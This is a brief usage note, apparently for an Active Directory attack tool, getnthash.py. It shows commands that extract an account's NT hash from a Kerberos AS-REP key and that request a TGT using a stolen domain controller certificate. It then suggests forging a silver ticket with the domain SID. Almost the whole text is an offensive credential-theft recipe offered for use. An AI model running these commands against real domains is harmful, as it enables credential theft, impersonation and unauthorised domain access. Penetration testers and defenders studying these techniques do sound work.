# getnthash.py

Helps to get the NT hash of things (after using gettgtpkinit.py to get the AS-REP key that accompanies a TGT, for example).

# Extract NT hash

This step requires the AS-REP key you got as part of using gettgtpkinit

export KRB5CCNAME=x.ccache
getnthash.py domain.com/server123\$ -key THE-AS-REP-HASH 

# Request a TGT using a certificate and private key

gettgtpkinit.py -cert-pfx dc.pfx -pfx-pass 123456 domain.com/dc$ dc.ccache

Armed with this hash, you could grab the domain SID with lookupsid and then forge a silver ticket with ticketer.